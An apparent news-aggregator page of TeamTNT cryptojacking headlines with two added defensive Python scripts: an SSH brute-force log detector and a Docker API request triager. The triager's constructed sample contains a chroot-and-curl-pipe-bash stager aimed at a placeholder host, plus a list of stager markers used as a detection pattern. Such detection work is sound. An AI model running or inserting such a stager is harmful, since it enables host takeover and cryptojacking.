TeamTNT Exploits 16 Million IPs in Malware Attack on Docker Clusters
This article details a new campaign by TeamTNT, a notorious hacking group, leveraging exposed Docker daemons to deploy…
Notorious Hacker Group TeamTNT Launches New Cloud Attacks for Crypto Mining
The infamous cryptojacking group known as TeamTNT appears to be readying for a new large-scale campaign targeting cloud-native environments for mining cryptocurrencies and renting out breached servers to third-parties. "The group is currently targeting exposed Docker daemons to deploy Sliver...
New TeamTNT Cryptojacking Campaign Targets CentOS Servers with Rootkit
The cryptojacking operation known as TeamTNT has likely resurfaced as part of a new campaign targeting Virtual Private Server (VPS) infrastructures based on the CentOS operating system. "The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim's assets, during whi...
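Brute-force initial access of the kind described in this entry leaves a distinctive trail in sshd logs: a burst of failed logins from one source, often cycling through usernames, followed by a success from the same source. The following is an added example, not code from the article above or from the researchers it cites. It parses a constructed snippet of syslog-style sshd output and flags a source address that accumulates repeated failures inside a short window and, more importantly, one that then succeeds. The host name, addresses, usernames, threshold and window are all constructed assumptions for illustration.

```python
"""Spot SSH brute-force bursts and success-after-burst in sshd log lines.

Added example; the log lines below are constructed, not real evidence.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: a burst from one source that ends in a successful
# password login, one normal key-based login, one stray failure, and a
# pam_unix line that does not match the pattern and is ignored.
CONSTRUCTED_AUTH_LOG = """\
Sep 10 03:14:01 vps1 sshd[2201]: Failed password for root from 203.0.113.7 port 51122 ssh2
Sep 10 03:14:03 vps1 sshd[2203]: Failed password for invalid user admin from 203.0.113.7 port 51130 ssh2
Sep 10 03:14:05 vps1 sshd[2205]: Failed password for root from 203.0.113.7 port 51138 ssh2
Sep 10 03:14:08 vps1 sshd[2207]: Failed password for invalid user oracle from 203.0.113.7 port 51144 ssh2
Sep 10 03:14:11 vps1 sshd[2209]: Failed password for root from 203.0.113.7 port 51150 ssh2
Sep 10 03:14:14 vps1 sshd[2211]: Failed password for root from 203.0.113.7 port 51158 ssh2
Sep 10 03:14:20 vps1 sshd[2230]: Accepted password for root from 203.0.113.7 port 51200 ssh2
Sep 10 03:15:00 vps1 sshd[2240]: Accepted publickey for deploy from 198.51.100.4 port 40000 ssh2
Sep 10 03:16:30 vps1 sshd[2250]: Failed password for invalid user test from 192.0.2.9 port 33000 ssh2
Sep 10 03:16:31 vps1 sshd[2251]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.0.2.9
"""

# Matches both "Failed password for root from ..." and
# "Failed password for invalid user admin from ..." as well as "Accepted ..." lines.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_line(line):
    """Return a dict for an auth result line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Syslog timestamps carry no year; relative ordering is all we need here.
    return {
        "ts": datetime.strptime(m["ts"], "%b %d %H:%M:%S"),
        "result": m["result"],
        "method": m["method"],
        "user": m["user"],
        "ip": m["ip"],
    }


def analyze(log_text, threshold=5, window_s=60):
    """Per source IP: failure count, usernames tried, whether a burst of
    >= threshold failures landed inside window_s seconds, and whether a
    login was accepted while such a burst was still in the window."""
    findings = {}
    recent_failures = defaultdict(list)
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        ip = ev["ip"]
        rec = findings.setdefault(
            ip, {"failures": 0, "users": set(), "burst": False, "success_after_burst": False}
        )
        # Keep only failures still inside the sliding window for this source.
        recent_failures[ip] = [
            t for t in recent_failures[ip] if (ev["ts"] - t).total_seconds() <= window_s
        ]
        if ev["result"] == "Failed":
            rec["failures"] += 1
            rec["users"].add(ev["user"])
            recent_failures[ip].append(ev["ts"])
            if len(recent_failures[ip]) >= threshold:
                rec["burst"] = True
        elif len(recent_failures[ip]) >= threshold:
            # A success right after a burst is the interesting event: the
            # guess worked, and the host is now likely compromised.
            rec["success_after_burst"] = True
    return findings


if __name__ == "__main__":
    for ip, rec in analyze(CONSTRUCTED_AUTH_LOG).items():
        print(ip, rec)
```

The threshold and window are deliberately low so the constructed sample trips them; on a real fleet, feed the function the output of `journalctl -u ssh` or `/var/log/auth.log` and tune both to your baseline. The success-after-burst flag is the one worth paging on: a burst alone is Internet background noise, a burst followed by an accepted password login is an incident.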
TeamTNT's Cloud Credential Stealing Campaign Now Targets Azure and Google Cloud
A malicious actor has been linked to a cloud credential stealing campaign in June 2023 that's focused on Azure and Google Cloud Platform (GCP) services, marking the adversary's expansion in targeting beyond Amazon Web Services (AWS). The findings come from SentinelOne and Permiso, which said the...
TeamTNT's Silentbob Botnet Infecting 196 Hosts in Cloud Attack Campaign
As many as 196 hosts have been infected as part of an aggressive cloud campaign mounted by the TeamTNT group called Silentbob. "The botnet run by TeamTNT has set its sights on Docker and Kubernetes environments, Redis servers, Postgres databases, Hadoop clusters, Tomcat and Nginx servers, Weave...
Silentbob Campaign: Cloud-Native Environments Under Attack
Cybersecurity researchers have unearthed an attack infrastructure that's being used as part of a "potentially massive campaign" against cloud-native environments. "This infrastructure is in early stages of testing and deployment, and consists mainly of an aggressive cloud worm, designed to...
Cryptojacking Group TeamTNT Suspected of Using Decoy Miner to Conceal Data Exfiltration
The cryptojacking group known as TeamTNT is suspected to be behind a previously undiscovered strain of malware used to mine Monero cryptocurrency on compromised systems. That's according to Cado Security, which found the sample after Sysdig detailed a sophisticated attack known as SCARLETEEL aime...
New Cryptojacking Campaign Targeting Vulnerable Docker and Kubernetes Instances
A new cryptojacking campaign has been uncovered targeting vulnerable Docker and Kubernetes infrastructures as part of opportunistic attacks designed to illicitly mine cryptocurrency. Cybersecurity company CrowdStrike dubbed the activity Kiss-a-dog, with its command-and-control infrastructure...
TeamTNT Returns – or Does It?
Our honeypots caught malicious cryptocurrency miner samples targeting the cloud and containers, and their routines are reminiscent of the routines employed by cybercriminal group TeamTNT, which was said to have quit in November 2021. Our investigation shows that another threat actor group, WatchDog...
Security Breaks: TeamTNT’s DockerHub Credentials Leak
One of our honeypots based on exposed Docker REST APIs showed cybercriminal group TeamTNT’s potential attack scenario and leak of container registry credentials for docker-abuse malware. The full version of this research will be presented at the c0c0n XV Hacking and Cyber Security Conference in...
Watch Out! Cryptocurrency Miners Targeting Dockers, AWS and Alibaba Cloud
LemonDuck, a cross-platform cryptocurrency mining botnet, is targeting Docker to mine cryptocurrency on Linux systems as part of an active malware campaign. "It runs an anonymous mining operation by the use of proxy pools, which hide the wallet addresses," CrowdStrike said in a new report. "It...
TeamTNT targeting AWS, Alibaba
By Darin Smith. TeamTNT is actively modifying its scripts after they were made public by security researchers. These scripts primarily target Amazon Web Services, but can also run on on-premise, container, or other forms of Linux instances. The group's payloads include credential stealers,... This i...
TeamTNT Upgrades Arsenal, Refines Focus on Kubernetes and GPU Environments
Using a new batch of campaign samples, we take a look at its more recent cybercrime contributions and compare them with its previous deployments to demonstrate the group’s use of upgraded tools and payloads...
Compromised Docker Hub Accounts Abused for Cryptomining Linked to TeamTNT
In October 2021, we observed threat actors targeting poorly configured servers with exposed Docker REST APIs by spinning up containers from images that execute malicious scripts...
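The pattern in this entry, and in the exposed-Docker-daemon entries above, is the same each time: an attacker reaches an unauthenticated Docker Engine API, and the first request worth catching is a `POST /containers/create` whose body asks for the host root bind-mounted into the container, a privileged container, or a command that downloads and runs a stager. The following is an added example, not code from any of the articles listed or from the researchers behind them. It triages captured request bodies (assumed to come from a reverse proxy or honeypot placed in front of the daemon) for exactly those host-takeover indicators; the request records, path list and shell markers are constructed assumptions, to be tuned to your own fleet.

```python
"""Triage Docker Engine API container-creation requests for host-takeover patterns.

Added example; the request bodies below are constructed, not captured traffic.
"""

# Host paths that, bind-mounted into a container, effectively hand over the host.
# Assumption: tune to your environment.
SENSITIVE_HOST_PATHS = ("/", "/root", "/etc", "/proc", "/sys", "/var/run/docker.sock")
# Shell fragments typical of download-and-execute stagers in cryptojacking campaigns.
STAGER_MARKERS = ("chroot /host", "curl ", "wget ", "| bash", "| sh", "base64 -d")
DANGEROUS_CAPS = ("ALL", "SYS_ADMIN", "SYS_MODULE", "SYS_PTRACE")

# Constructed JSON bodies of POST /containers/create, in the Engine API shape.
CONSTRUCTED_REQUESTS = [
    # 0: benign web container, no host access.
    {"Image": "nginx:1.25", "Cmd": None,
     "HostConfig": {"Binds": [], "Privileged": False, "PidMode": ""}},
    # 1: host root mounted, privileged, host PID, chroot-and-download stager.
    {"Image": "alpine:latest",
     "Cmd": ["sh", "-c", "chroot /host bash -c 'curl -s http://example.invalid/x.sh | bash'"],
     "HostConfig": {"Binds": ["/:/host"], "Privileged": True, "PidMode": "host"}},
    # 2: docker.sock mounted, so the container can drive the daemon itself.
    {"Image": "alpine", "Cmd": ["sh"],
     "HostConfig": {"Binds": ["/var/run/docker.sock:/var/run/docker.sock"]}},
    # 3: newer Mounts syntax plus an added capability.
    {"Image": "busybox", "Cmd": ["sleep", "infinity"],
     "HostConfig": {"CapAdd": ["SYS_ADMIN"],
                    "Mounts": [{"Type": "bind", "Source": "/etc", "Target": "/mnt/etc"}]}},
]


def _as_list(value):
    """Cmd/Entrypoint may be a string, a list, or absent in the API."""
    if value is None:
        return []
    if isinstance(value, str):
        return [value]
    return list(value)


def _mounted_host_paths(host_config):
    """Collect host-side paths from both the legacy Binds and newer Mounts forms."""
    paths = []
    for bind in host_config.get("Binds") or []:
        paths.append(bind.split(":", 1)[0])  # "host:container[:opts]"
    for mount in host_config.get("Mounts") or []:
        if mount.get("Type") == "bind" and mount.get("Source"):
            paths.append(mount["Source"])
    return paths


def _is_sensitive(path):
    path = path.rstrip("/") or "/"
    if path == "/":
        return True
    return any(path == p or path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS if p != "/")


def risk_findings(req):
    """Return a list of human-readable indicators for one create request."""
    findings = []
    hc = req.get("HostConfig") or {}
    if hc.get("Privileged"):
        findings.append("privileged container")
    if hc.get("PidMode") == "host":
        findings.append("host PID namespace")
    if hc.get("NetworkMode") == "host":
        findings.append("host network namespace")
    for cap in hc.get("CapAdd") or []:
        if cap.upper() in DANGEROUS_CAPS:
            findings.append(f"dangerous capability: {cap}")
    for path in _mounted_host_paths(hc):
        if _is_sensitive(path):
            findings.append(f"host path mounted: {path}")
    cmd_text = " ".join(_as_list(req.get("Entrypoint")) + _as_list(req.get("Cmd")))
    for marker in STAGER_MARKERS:
        if marker in cmd_text:
            findings.append(f"stager pattern in command: {marker.strip()}")
    return findings


def triage(requests):
    """(index, findings) for every request that raised at least one indicator."""
    out = []
    for i, req in enumerate(requests):
        f = risk_findings(req)
        if f:
            out.append((i, f))
    return out


if __name__ == "__main__":
    for idx, f in triage(CONSTRUCTED_REQUESTS):
        print(f"request {idx}: " + "; ".join(f))
```

This is a detection after the fact; the control that removes the problem is not exposing the daemon at all. Leave `dockerd` on its Unix socket, and if a TCP listener is unavoidable, require TLS client certificates rather than a bare `tcp://0.0.0.0:2375`, which is the configuration every campaign above relies on.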
TeamTNT’s New Tools Target Multiple OSes
The TeamTNT malware pushers have a slew of new toys with which to wreak havoc – multiple shell/batch scripts, open-source tools, a cryptocurrency miner, an IRC and more – that have inflicted more than 5,000 infections globally as antivirus (AV) tools struggle to catch up with the newest malware...
IBM: Unauthorized Kubernetes to RCE (root) and found TEAMTNT Crypto Miner on it
This report revealed a vulnerable server running an unauthorized Kubernetes instance, which allowed unkn0wn to gain remote code execution. This issue was reported to IBM and has been remediated...
TeamTNT Campaigns Emphasize Importance of Addressing Cloud Security Gaps
Having covered TeamTNT in several of our blog entries over the past couple of years, we embarked on research that encompasses the malicious actor group's campaigns, tools, and techniques in 2020 and early 2021...